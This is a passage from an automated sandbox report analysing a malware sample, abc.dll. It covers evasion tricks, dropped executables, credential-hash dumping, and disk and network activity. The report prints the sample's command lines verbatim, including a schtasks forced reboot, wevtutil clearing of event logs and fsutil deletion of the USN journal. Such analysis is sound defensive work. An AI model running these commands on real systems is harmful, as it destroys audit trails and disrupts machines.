Source: C:\Windows\System32\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_1-7255
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exe | Dropped PE file which has not been started: C:\Windows\dllhost.dat
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_5-3844
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\loaddll32.exe TID: 2720 | Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2792 | Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -2700000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1200000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -900000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776 | Thread sleep time: -540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2856 | Thread sleep time: -3540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728 | Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852 | Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2848 | Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776 | Thread sleep time: -180000s >= -60s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\rundll32.exe | File opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp | Code function: 5_2_00F62566 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00F62566

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
Contains functionality to query local / system time
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E84DF GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,wsprintfW,1_2_011E84DF
Contains functionality to query windows version
Source: C:\Windows\System32\rundll32.exe | Code function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Queries the cryptographic machine GUID
Source: C:\Windows\System32\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Behavior Graph ID: 309071
Sample: abc.dll
Startdate: 12/07/2017
Architecture: WINDOWS
Score: 100

Graph nodes and edges (from the graph export; the rendered graph image is not included):

  • loaddll32.exe (started by main)
    • rundll32.exe (started by loaddll32.exe)
      • Signatures (11 further signatures hidden at this level): Clears the journal log; Clears the windows event log; Connects to many different private IPs (likely to spread or exploit)
      • Connected IPs (2 further connected IPs hidden at this level): 192.168.1.1 (unknown, unknown); 192.168.1.0 (unknown, unknown); 192.168.1.2, port 80 (unknown, unknown)
      • Dropped files: F915.tmp (PE32); dllhost.dat (PE32)
      • cmd.exe (started by rundll32.exe)
        • Signature: Clears the journal log
        • schtasks.exe (started by cmd.exe)
      • F915.tmp (started by rundll32.exe)
        • Signature: Contains functionality to dump credential hashes (LSA Dump)
      • cmd.exe (started by rundll32.exe)
        • Signature: Clears the journal log
        • wevtutil.exe (started by cmd.exe)
        • wevtutil.exe (started by cmd.exe)

Yara Overview

No Yara matches

Screenshot


Startup

  • system is w7_1
  • loaddll32.exe (PID: 2716 cmdline: loaddll32.exe 'C:\Users\user\Desktop\abc.dll' MD5: D2792A55032CFE825F07DCD4BEC5F40F)
    • rundll32.exe (PID: 2724 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • cmd.exe (PID: 2768 cmdline: /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • schtasks.exe (PID: 2824 cmdline: schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • F915.tmp (PID: 2800 cmdline: 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420} MD5: 2813D34F6197EB4DF42C886EC7F234A1)
      • cmd.exe (PID: 2868 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 2888 cmdline: wevtutil cl Setup MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2948 cmdline: wevtutil cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2960 cmdline: wevtutil cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2972 cmdline: wevtutil cl Application MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • fsutil.exe (PID: 2988 cmdline: fsutil usn deletejournal /D C: MD5: B4834F08230A2EB7F498DE4E5B6AB814)
  • cleanup

Created / dropped Files

File Path | Type and Hashes | Malicious
C:
  • Type: data
  • MD5: 50CF2382E783ADAA465FEEDD1DD36D11
  • SHA: A03E1F69DDBD94A6697E5447AD0B3D76381FEDF8
  • SHA-256: 3A954CE94ECA2286E3524407DB360CC9D809D8A861BC3E9EBA00715E044A33B5
  • SHA-512: D9094F9E2C8A44BE1CB966C5121CCD645E1A6A7F7339D28B4CB925A843AED8182937421BA6445C78E1D70793C5A9721E1B56AE0728A248AB17B73D6B77211E32
Malicious: true
C:\README.TXT
  • Type: data
  • MD5: DEC0F31784A36435A9A8A2F4419E29C4
  • SHA: 131E51447D2CB7BD1D64C5EA6C78752D946E3558
  • SHA-256: C61506A25D135D19DEA2BE38718A800DA9821395EAD5AE356723D2BF089591CB
  • SHA-512: 7CE28F4D01E449AB61F7D6FB38264223EBC2C0FDA91D3E60AC6C3F21D654B67AEAC8B13097850779E77C71EA48EA01579B983C22B88150FB2335D5E9B79D868E
Malicious: true
C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: B8DB74A05685A45BB1257EF3AD87C0AE
  • SHA: 8C23DD9DCC1989BEC7C2D026216DECD1FAE674C5
  • SHA-256: 225E05DC9B98D7A7D63CDE112D6F879FC0C7124FB564746B700DAC839653C2B9
  • SHA-512: D085682BBCCC42160C86FADAA45181A0859C4BAF1900C3C04338571672CAB57A610887B9D29F87CC49B604F8F0544A82C0096E41E58D15733E7FC3BC82A81C5C
Malicious: true
C:\Users\user\Desktop\abc.dll
  • Type: data
  • MD5: 9A7FFE65E0912F9379BA6E8E0B079FDE
  • SHA: 532BEA84179E2336CAED26E31805CEAA7EEC53DD
  • SHA-256: 4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
  • SHA-512: E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
Malicious: false
C:\Windows\dllhost.dat
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: AEEE996FD3484F28E5CD85FE26B6BDCD
  • SHA: CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
  • SHA-256: F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
  • SHA-512: E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
Malicious: false
\Device\Harddisk0\DR0
  • Type: partition 2: ID=0x7, starthead 223, startsector 206848, 41734144 sectors, code offset 0x31
  • MD5: 2AAE6A1A720CFD62732FA7D13131D616
  • SHA: 4E43CF175A371E574D5FF21FACF777DB6E520652
  • SHA-256: 2E24E0203DD25DDDD95B1B574915AF282C9CF5AF42B7FFA46E94A855C1A3C386
  • SHA-512: 39A8B58044A950A3EC44F43D4B45C42E62E480F4450AC9E6EE1611A5703BB69908654078936C3E71E6011D759B08EBE64D94AD72323C0E68A7161ED8AC993D67
Malicious: true
unknown
  • Type: ASCII text, with CRLF line terminators
  • MD5: F7B0D39E5B2B15C4CA6ACDAFE1A3CB9C
  • SHA: BAE8F0CC04A7E7218E1B57D84F784DB9246E6606
  • SHA-256: C3CD57E6E2D2C980B50245BE712785DCB0721A812C317292DAA7E99BA32A7362
  • SHA-512: A078E25F04800918B3E80490C64AEAA3B88E88DDAA6C8F963E6D0DFDC26BF8BE7440F3EB27253A5693DB4604604DB6BA3E42BB47B840CCAA47DE1428E66365A4
Malicious: true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

IP | Country | Flag | ASN | ASN Name | Malicious
192.168.1.1 | unknown | | unknown | unknown | false
192.168.1.0 | unknown | | unknown | unknown | false
192.168.1.2 | unknown | | unknown | unknown | false
192.168.1.16 | unknown | | unknown | unknown | false
192.168.1.13 | unknown | | unknown | unknown | false

Static File Info

General

File type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:abc.dll
File size:362360
MD5:71b6a493388e7d0b40c83ce903bc6b04
SHA1:34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256:027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512:072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8/.jV|.jV|.jV|&$.|.jV|...|.jV|...|.jV|...|.jV|...|.jV|.jW|.jV|...|.jV|...|.jV|...|.jV|Rich.jV|................PE..L...\(FY...

File Icon

Static PE Info

General

Entrypoint:0x10007d39
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5946285C [Sun Jun 18 07:14:36 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:52dd60b5f3c9e2f17c2e303e8c8d4eab

Authenticode Signature

Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
  • 12/7/2009 11:40:29 PM 3/7/2011 11:40:29 PM
Subject Chain
  • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Serial:6101CF3E00000000000F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+0Ch]
dec eax
jne 0E4F04A1h
mov eax, dword ptr [ebp+08h]
push eax
mov dword ptr [1001F120h], eax
call dword ptr [1000D0E0h]
xor eax, eax
inc eax
pop ebp
retn 000Ch
push ebp
mov ebp, esp
call 0E4F12FBh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 0E4F0494h
mov dword ptr [ecx], eax
xor eax, eax
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000618h
push esi
xor esi, esi
cmp dword ptr [1001F0FCh], esi
je 0E4F04F0h
cmp dword ptr [1001F11Ch], esi
je 0E4F04E8h
mov eax, dword ptr [ebp+08h]
lea edx, dword ptr [eax+02h]
mov cx, word ptr [eax]
add eax, 02h
cmp cx, si
jne 0E4F0487h
sub eax, edx
sar eax, 1
push eax
push dword ptr [ebp+08h]
push 100140D0h
call 0E